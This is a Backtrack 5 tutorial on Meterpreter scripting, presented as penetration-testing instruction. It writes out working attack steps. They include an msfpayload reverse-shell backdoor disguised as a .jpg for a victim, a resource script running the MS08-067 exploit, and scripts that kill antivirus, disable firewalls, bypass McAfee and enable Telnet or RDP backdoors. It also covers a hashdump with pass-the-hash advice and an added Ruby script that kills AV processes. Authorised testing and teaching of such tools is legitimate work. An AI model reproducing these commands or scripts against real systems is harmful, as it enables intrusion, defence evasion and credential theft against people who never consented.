Metasploit Meterpreter Scripting Backtrack 5 Tutorial


Information security is a broad field that takes in penetration testing and computer forensics as well. There are many tools for penetration testing a target, and Metasploit is one of the best of them. Meterpreter is a powerful Metasploit payload: it is injected into a process on the target as a DLL and communicates with the attacker over a socket. It gives the operator a rich environment on the compromised host for running commands, transferring files and loading further extensions.


A Meterpreter session is obtained after a host has been successfully exploited. The Meterpreter scripts shipped with Metasploit automate a number of post-exploitation tasks, such as:

  • Capture the screen
  • Keylogging
  • File transfer
  • Service detection and more

Besides the scripts that ship with Metasploit, you are free to write your own to suit the job at hand. The important facts about Meterpreter scripts are:

  • Written in the Ruby programming language
  • Located in the scripts/meterpreter directory of the Metasploit install (/pentest/exploits/framework3 on Backtrack 5)
  • New scripts are contributed regularly by different authors; the contents of that directory are the current list
  • Very useful for automating work after a host has been compromised
  • Built on the Meterpreter client API, which every script reaches through the client object
Plenty of Meterpreter scripts are publicly available, but writing a new one of your own, for your own use or for general use, is easy. You only need to follow a few conventions so that your script does not clash with the framework's standard variables. Knowing Ruby is the basic requirement; the other important rules are:

  • Always include a description so that others understand what the script does
  • Use local variables, not global ones: every script runs inside the same msfconsole process, so a global set by one script leaks into the next
  • Always provide a help option (-h) so the usage is discoverable
  • Keep the target in mind (operating system, service pack on Windows, kernel version on Unix) while writing the script, because not every version of a piece of software has the same vulnerabilities
Let's take an example. In our scenario we need to create a backdoored file to send to the victim. With Metasploit that is no trouble at all; a single msfpayload command does it:

root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 S
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > test.jpg

The last argument selects the output format: S prints the summary shown above, X writes a Windows executable to the redirected file. The file is a PE executable whatever it is called; naming it test.jpg only hides that from a casual look, and Windows will hand a .jpg to an image viewer rather than run it. (msfpayload and msfencode were later replaced by msfvenom, which takes the same payload and option syntax with -p and -f exe.)



Since all of this has to be typed each time, we can put it in a script and re-run it with one command:

root@bt:/pentest/exploits/framework3# cat > a.rb <<'EOF'
# Re-generate the backdoor with the same payload and options every time
system("msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > test.jpg")
EOF
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#

Note that a.rb is an ordinary Ruby wrapper around a shell command, not a Meterpreter script; Meterpreter scripts run inside an established session.

The result is the same file. The one-liner itself is fast; what costs time is repeating the same steps by hand, so why not script the whole job? Many Meterpreter scripts already exist for exactly that purpose; see the picture below.


That was a small example. Now let's write a resource script (an .rc file of msfconsole commands) that runs an exploit against a vulnerable host:

root@bt:/pentest/exploits/framework3# cat > test.rc <<'EOF'
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.6
set LHOST 192.168.1.2
set LPORT 4444
exploit
EOF
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc


Doing the same thing by hand, we would have to:
  • Pick the exploit (I had run Nessus beforehand, which is how I knew the host was vulnerable to the MS08-067 netapi bug)
  • Set the remote host manually
  • Set the local host and port for the reverse connection manually
After the resource script runs, a Meterpreter session is opened only if the target really is vulnerable, as it was in this case.


In this Meterpreter session we can now call the different scripts, including ones we wrote ourselves as discussed above. Below are some of the most useful Meterpreter scripts for penetration testing. Their developers refine them constantly, so stay active in the community, on blogs and on forums to keep up to date.

Screenspy Script


This basic script captures the screen of the victim's computer. Just type "run screenspy"; for usage help type "run screenspy -h" at the Meterpreter prompt. After it runs, the screenshot of the victim's desktop at that moment is opened in Firefox on the attacking machine.

KillAv Script

Killav is a well-known script. As the name suggests, it kills (terminates) antivirus processes, so if you don't want antivirus software getting in your way, terminate it with this script:

meterpreter > run killav
[*] Killing Antivirus services on the target...
meterpreter >

Killav carries the process names of most of the better-known antivirus products, but for a newer product you will have to add its process name to the script yourself. Bear in mind that killing the process is noisy: many products have a watchdog service that restarts it, and a centrally managed product will report the termination to its console. Looking in the script file, the process names it checks for include:
  • winppr32.exe
  • winrecon.exe
  • winservn.exe
  • winssk32.exe
  • winstart.exe
  • winstart001.exe
  • wintsk32.exe
  • winupdate.exe
  • wkufind.exe
  • wnad.exe
  • wnt.exe
  • wradmin.exe
  • wrctrl.exe
  • wsbgate.exe
  • wupdater.exe
  • wupdt.exe
  • wyvernworksfirewall.exe
  • xpf202en.exe
  • zapro.exe
  • zapsetup3001.exe
  • zatutor.exe
  • zonalm2601.exe
  • zonealarm.exe
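To tie the scripting rules given earlier (a description, a -h help option, local variables only) to the killav idea, here is an added example of a Meterpreter script written in the same style as killav.rb. It is not code from the page or from Metasploit; the script name killav_custom, the helper names, the hypothetical process name avguard.exe and the short watch list are assumptions for illustration. The pure-Ruby matching functions at the top run stand-alone; the glue at the bottom runs only when msfconsole loads the file from scripts/meterpreter with "run killav_custom", where the framework provides client, args and the print_* helpers.

```ruby
# killav_custom.rb: a Meterpreter script in the same style as killav.rb.
# Drop it into scripts/meterpreter/ and run it from a session with
# "run killav_custom" (or "run killav_custom -k" to kill what it finds).
# Added example, not from the original page or from Metasploit itself.

# Watch list of process names (assumption: a short illustrative subset,
# three names from the killav list plus one hypothetical engine name).
AV_PROCESSES = %w[zonealarm.exe wyvernworksfirewall.exe winssk32.exe avguard.exe].freeze

# Pure Ruby core, testable without a session: takes an array of process
# hashes shaped like client.sys.process.get_processes returns them
# (keys 'pid' and 'name') and returns the ones whose name is on the list.
def find_av_processes(procs, watch = AV_PROCESSES)
  wanted = watch.map(&:downcase)
  procs.select { |p| wanted.include?(p['name'].to_s.downcase) }
end

# Turn matches into [pid, name, action] triples; action is :kill or :list.
def plan_actions(procs, kill, watch = AV_PROCESSES)
  find_av_processes(procs, watch).map do |p|
    [p['pid'], p['name'], kill ? :kill : :list]
  end
end

# Meterpreter glue. This part only runs when msfconsole loads the file,
# where the framework provides `client`, `args`, print_status and friends.
# Local variables only: a global here would survive into the next script.
if defined?(client) && client
  kill = false
  opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu."],
    "-k" => [false, "Kill the matching processes instead of listing them."]
  )
  opts.parse(args) do |opt, _idx, _val|
    case opt
    when "-h"
      print_line("killav_custom -- list (or kill) AV and firewall processes from a watch list")
      print_line(opts.usage)
      raise Rex::Script::Completed
    when "-k"
      kill = true
    end
  end

  print_status("Enumerating processes on #{client.sys.config.sysinfo['Computer']}")
  plan_actions(client.sys.process.get_processes, kill).each do |pid, name, action|
    if action == :kill
      print_status("Killing #{name} (PID #{pid})")
      client.sys.process.kill(pid)
    else
      print_status("Found #{name} (PID #{pid})")
    end
  end
end
```

Keeping the decision logic in plain functions that take a process list means the script can be exercised with a constructed list before it ever touches a live session, and the same functions can be reused by a second script without copying the watch list.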

Getcountermeasure Script


Killav is a powerful script and kills many different antivirus products, but when you run it Windows may pop up errors and other alerts, and it does nothing about firewalls. A script called Getcountermeasure takes care of that:

meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies

OPTIONS:

-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.


This script is a good deal more capable than Killav: it lists antivirus, HIPS and third-party firewall processes (which are very common nowadays), can kill them, and can disable the built-in Windows firewall. To use it:

meterpreter > run getcountermeasure -d 

[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...

Note what the help text above does and does not list: the script reports firewall state and the DEP and UAC policies, and -d disables the built-in firewall, but it has no option for clearing logs. Clearing event logs is done with Meterpreter's separate clearev command, which wipes the Application, System and Security logs (itself a loud action that a defender will notice). The rest of the run is shown in the picture.


Gettelnet script

Gettelnet enables the Telnet service on the victim's Windows machine, which gives you a remote shell for later use. Bear in mind that Telnet is cleartext and an obvious thing for a defender to notice. For something more robust you can use the SSH service for the remote connection, or install netcat as a backdoor on the compromised host for future connections. For usage help:
  meterpreter > run gettelnet -h


Many other scripts are available, but here we will cover only the most important ones. These help you understand the network and set up future connections:

Netenum - Network Enumeration Script

Netenum is a network enumeration script that can perform:
  • Domain Name for DNS Forward Lookup
  • To Perform DNS Forward Lookup on host list and domain
  • The target address range or CIDR identifier
  • To Perform DNS lookup of MX and NS records for a domain
  • To Perform Service Record DNS lookup for a domain
  • To Perform Ping Sweep on IP Range


Checkvm - Check Virtual Machine

Virtual machines are now a standard part of enterprise networks, large and small. Checkvm tells you whether the victim is running in a virtual machine and, if so, what type. Here is the output in this case:

 meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >

Virus Scan Bypass

This script bypasses McAfee VirusScan Enterprise v8.7.0i+: it uploads an executable to the TEMP folder, adds it to the scanner's exclusion list and sets it to run at startup. We have already covered two scripts that kill antivirus protection, but it is worth running different scripts to make sure your foothold survives. For usage:
 
  meterpreter > run virusscan_bypass -h

Enable RDP - Getgui

If you want a graphical desktop on the victim's computer, you need to enable the RDP (Remote Desktop Protocol) service. The getgui script does that with -e (it can also add a user for you with -u and -p):
  meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode

Hashdump


Last but not least, I don't want to end this article without hashdump, which collects the local account password hashes from the victim for later use. Each line is user:RID:LM hash:NT hash:::. The hashes can be cracked offline, and because Windows authenticates with the hash itself, an NT hash is often reusable directly against other hosts where the same local account password is set (pass-the-hash):

 meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::
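Two constants are worth knowing when reading a dump like this: aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password (it is also what appears when LM hash storage is disabled), and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. The Administrator and Guest entries above therefore have blank passwords, and HelpAssistant is the only account with a real, crackable LM hash. As an added example (not from the page or from Metasploit), the Ruby below parses pwdump-format output and triages it; the function and flag names are assumptions, and the sample is the page's own hashdump output embedded as a string.

```ruby
# Triage hashdump / pwdump output. Added example; not part of the page.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze # LM hash of "" (also shown when LM storage is off)
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze # NT hash of ""

Account = Struct.new(:user, :rid, :lm, :nt)

# Parse "user:rid:lm:nt:::" lines; status lines such as "[*] ..." are skipped.
def parse_pwdump(text)
  text.each_line.map(&:strip).map do |line|
    fields = line.split(':')
    next unless fields.size >= 4 && fields[1] =~ /\A\d+\z/
    next unless fields[2] =~ /\A\h{32}\z/ && fields[3] =~ /\A\h{32}\z/
    Account.new(fields[0], fields[1].to_i, fields[2].downcase, fields[3].downcase)
  end.compact
end

# One hash of findings per account. :blank_password -> NT hash equals NT("");
# :lm_stored -> a real LM hash is present (password <= 14 chars, case-folded,
# split into two 7-byte halves, so cheap to crack); :builtin_admin -> RID 500.
def triage(accounts)
  accounts.map do |a|
    { user: a.user, rid: a.rid,
      blank_password: a.nt == EMPTY_NT,
      lm_stored: a.lm != EMPTY_LM,
      builtin_admin: a.rid == 500 }
  end
end

# NT hashes shared by more than one account: the same password reused, and
# a single crack (or pass-the-hash) covers all of them.
def shared_hashes(accounts)
  accounts.group_by(&:nt)
          .select { |nt, list| nt != EMPTY_NT && list.size > 1 }
          .transform_values { |list| list.map(&:user) }
end

SAMPLE_DUMP = <<~DUMP # the page's own hashdump output, embedded for the example
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::
DUMP

if __FILE__ == $PROGRAM_NAME
  triage(parse_pwdump(SAMPLE_DUMP)).each do |t|
    notes = []
    notes << 'BLANK PASSWORD' if t[:blank_password]
    notes << 'LM hash stored' if t[:lm_stored]
    notes << 'built-in Administrator (RID 500)' if t[:builtin_admin]
    puts format('%-18s %s', t[:user], notes.empty? ? 'no findings' : notes.join(', '))
  end
end
```

Run it on a real dump and the blank-password and reused-hash accounts are the ones to report first; they need no cracking at all.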

If you have some other wonderful scripts, please share with in the comments!

